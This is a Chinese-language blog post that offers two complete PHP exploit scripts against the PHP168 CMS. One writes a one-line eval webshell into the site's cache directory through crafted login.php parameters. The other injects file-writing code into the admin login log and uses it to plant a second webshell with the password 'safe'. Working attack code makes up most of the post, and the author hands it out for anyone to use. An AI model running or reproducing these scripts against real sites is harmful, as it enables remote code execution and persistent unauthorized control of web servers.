正在阅读:

PHP168 GetShell 0day

13,113

最近好忙,一直没有时间更新博客,对不住大伙了。这两天渗透测试一项目,遇到了php168,也就是现在的齐博CMS文章系统的前身。关注了一下php168的漏洞,折腾出来了两个exp发给大家玩玩,喜欢的拿去,不喜欢的算了。

PHP168 6.0以下版本Getshell

入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。

<?php
/**
 * Created by 独自等待
 * Date: 13-11-19
 * Time: 上午11:26
 * Name: php168_getshell.php
 * 独自等待博客:http://www.waitalone.cn/
 */
print_r('
+------------------------------------------------------+
             PHP168 login.php GetShell EXP
             Site:http://www.waitalone.cn/
                Exploit BY: 独自等待
                  Time:2013-11-19
+------------------------------------------------------+
');
if ($argc < 3) {
    print_r('
+------------------------------------------------------+
Useage: php ' . $argv[0] . ' host path
Host: target server (ip/hostname)
Path: path of login.php
Example: php ' . $argv[0] . ' localhost /php168
+------------------------------------------------------+
    ');
    exit;
}
error_reporting(7);
$host = $argv[1];
$path = $argv[2];
$shell = 'safe.php';
$code = '<?php%20@eval($_POST[safe])?>';
$url = "http://$host/$path/cache/$shell";
echo '正在GetShell,请稍候……' . "\n\n";
send_pack();
shell_ok($url);
//判断shell是否写入成功
function shell_ok($url)
{
    $headers = get_headers($url);
    if (strpos($headers[0], 'HTTP/1.1 200 OK') === 0) {
        echo '恭喜大爷,一句话写入成功,密码为:safe' . "\n\n" . 'Shell地址为:' . $url . "\n";
    } else {
        echo 'Shell写入失败,请尝试更换目录测试。' . "\n";
    }

}

//发送数据包函数
function send_pack()
{
    global $host, $path, $shell, $code;
    $data = "GET " . $path . "/login.php?makehtml=1&chdb[htmlname]=$shell&chdb[path]=cache&content=$code HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "User-Agent: BaiduSpider\r\n";
    $data .= "Connection: Close\r\n\r\n";
    $fp = @fsockopen($host, 80, $errno, $errstr, 30);
    //echo ini_get('default_socket_timeout');//默认超时时间为60秒
    if (!$fp) {
        echo $errno . '-->' . $errstr . "\n";
        exit('Could not connect to: ' . $host);
    } else {
        fwrite($fp, $data);
        $back = '';
        while (!feof($fp)) {
            $back .= fread($fp, 1024);
        }
        fclose($fp);
    }
    return $back;
}

?>

参考网站:http://huaidan.org/archives/3276.html

PHP168 4.0以下版本代码执行,可GetShell

这个在比较低版本下面可以测试成功,原理是php168在登陆的时候会把登陆信息保存了cache/adminlogin_logs.php文件中,保存的信息是在“”中,我们知道php中“”内是可以解析变量的,那么我们只要在登陆的信息中写入代码即可,详细的可以自己看下面的exp。

<?php
/**
 * Created by 独自等待
 * Date: 13-11-19
 * Time: 下午5:46
 * Name: php168_codeexec.php
 * 独自等待博客:http://www.waitalone.cn/
 */
print_r('
+------------------------------------------------------+
                PHP168 Code_Exec EXP
             Site:http://www.waitalone.cn/
                Exploit BY: 独自等待
                  Time:2013-11-19
+------------------------------------------------------+
');
if ($argc < 3) {
    print_r('
+------------------------------------------------------+
Useage: php ' . $argv[0] . ' host path
Host: target server (ip/hostname)
Path: path of php168
Example: php ' . $argv[0] . ' localhost /php168
+------------------------------------------------------+
    ');
    exit;
}
error_reporting(7);
//set_time_limit(30);
$host = $argv[1];
$path = $argv[2];
$exec = 'loginname=admin&loginpwd=${@file_put_contents($_GET[f],$_GET[s])}';
if (@fopen("http://$host/$path/cache/adminlogin_logs.php", 'r')) {
    echo '正在GetShell,请稍候……' . "\n\n";
    send_pack($exec);
    get_shell();
} else {
    exit('报告大爷,网站不存在此漏洞!');
}
//写入木马函数
function get_shell()
{
    global $host, $path;
    $shell_url = "http://$host/$path/cache/adminlogin_logs.php?f=config.php&s=<?php%20@eval(\$_POST[safe])?>";
    @file_get_contents($shell_url);
    $shell = "http://$host/$path/cache/config.php";
    if (@fopen($shell, 'r')) {
        echo '恭喜大爷,一句话写入成功,密码为:safe' . "\n\n" . 'Shell地址为:' . $shell . "\n";
    } else {
        echo 'Shell写入失败,请更换路径测试!' . "\n";
    }
}

//发送数据包函数
function send_pack($code)
{
    global $host, $path;
    $data = "POST " . $path . "/admin/index.php HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "User-Agent: BaiduSpider\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: " . strlen($code) . "\r\n";
    $data .= "Connection: Close\r\n\r\n";
    $data .= $code . "\r\n";
    //echo $data;exit;
    $fp = @fsockopen($host, 80, $errno, $errstr, 30);
    //echo ini_get('default_socket_timeout');//默认超时时间为60秒
    if (!$fp) {
        echo $errno . '-->' . $errstr . "\n";
        exit('Could not connect to: ' . $host);
    } else {
        fwrite($fp, $data);
        $back = '';
        while (!feof($fp)) {
            $back .= fread($fp, 1024);
        }
        fclose($fp);
    }
    return $back;
}

?>

PHP168 0day

由于PHP168文章系统已经不再更新了,改名为齐博CMS了,所以这两个0day其它用处不大的。。。

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌